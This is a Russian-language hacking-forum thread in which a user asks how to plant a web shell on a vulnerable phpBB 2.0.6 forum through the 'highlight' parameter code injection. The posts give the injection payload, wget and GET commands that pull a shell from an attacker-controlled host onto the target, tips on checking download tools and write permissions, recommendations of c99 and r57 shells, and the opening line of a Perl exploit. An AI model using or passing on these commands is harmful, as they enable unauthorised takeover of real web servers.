![]() |
Заливка шелла на phpBB 2.0.6 через highlights
Здравствуйте житили античата,я квам пришол с такой проблемой...прошу мою проблему не отвергать а ответить на нее...
Есть форум phpBB 2.0.6 уязвим но как тока я хочю залить на него шелл вот такой команндой: &highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/ то оно сначала грузит грузит а потом резко остонавлеваеться и неможет загрузить,я думал что оно шелл залило хахожу по ссылки www.site.ru/forum/remview.php а сайт говорит что такого файла нету,значит выходит с этого что шелл НЕ ЗАЛИЛСЯ !!! и еще когда пробую GET заливать тоже самое.. Ответте мне на токую проблему пожалуста....:) как можно прито-ком залить шелл ??? |
Ну...вы, батенька, напишите адресок форума, а мы (я точно) постараемся вам в этом "нелёгком" деле помочь. Пиши хотя бы в асю, если тут боязно.
Кстати, кто сказал, что там WGET работает??? |
Цитата:
wget -o home/www/forum/Nazvanie_Faila.php http://xxxx.x.xx/remview.php Плюс попробуй изменить расширение шелла на твоём сайте на txt. |
проверь какая качалка стоит на сайте which wget (curl,get,fetch) посмотри какие у тебя права (id) и убедись что папка в которую хочешь залить шелл открыта для записи,проверь правильность пути куда будешь заливать ессли в другую папку.
и воще remview.php имхо ужанно неудобный шел лучше заюзать c99 или последнюю версию r57. |
http://razrushitel.front.ru/frm.html
Это не то? |
Цитата:
|
ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям!
Вот тебе блин все что хочешь ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 Код:
#!/usr/bin/perl |
Заливай так GET http://твой_сервер/шелл.php>shell.php;ls -al
|
Цитата:
http://www.rcw-team.ru/hack/ |
Цитата:
Цитата:
Цитата:
|
| Время: 15:10 |